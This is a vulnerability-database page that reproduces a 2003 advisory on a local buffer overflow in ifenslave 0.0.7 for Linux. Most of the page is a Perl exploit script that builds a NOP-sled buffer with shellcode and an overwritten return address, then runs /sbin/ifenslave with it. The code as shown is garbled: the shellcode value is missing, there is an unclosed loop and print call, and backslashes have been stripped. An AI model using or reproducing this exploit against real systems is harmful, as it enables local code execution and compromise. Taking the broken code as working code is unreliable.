Ifenslave 0.0.7 – Argument Local Buffer Overflow (1)

Ifenslave 0.0.7 – Argument Local Buffer Overflow (1)

漏洞ID 1053892 漏洞类型
发布时间 2003-05-26 更新时间 2003-05-26
图片[1]-Ifenslave 0.0.7 – Argument Local Buffer Overflow (1)-安全小百科CVE编号 N/A
图片[2]-Ifenslave 0.0.7 – Argument Local Buffer Overflow (1)-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
source: http://www.securityfocus.com/bid/7682/info

ifenslave for Linux has been reported prone to a buffer overflow vulnerability.

The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space.

It is possible for a local attacker to seize control of the vulnerable application and have malicious arbitrary code executed in the context of ifenslave. ifenslave is not installed setUID or setGID by default.

It should be noted that although this vulnerability has been reported to affect ifenslave version 0.07 previous versions might also be affected. 

# expl-ifenslave.pl : Local buffer overflow exploit for
#                     ifsenslave v0.07
# Exploit tested on RedHat 8
# Author :
#    jlanthea [[email protected]]
# Syntax :
#    perl expl-ifenslave.pl  # works for me with offset = -17

$shellcode =

$offset = "0";

if(@ARGV == 1) { $offset = $ARGV[0]; }
$nop     = "x90";
$esp     = 0xbffff480;

for ($i = 0; $i < (48 - (length($shellcode)) - 4); $i++) {
    $buffer .= "$nop";

$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $offset));

print("Ifenslave local exploit by jlanthea - 2003n");
print("The new return address: 0x", sprintf('%lx',($esp + $offset)),
exec("/sbin/ifenslave '$buffer'");

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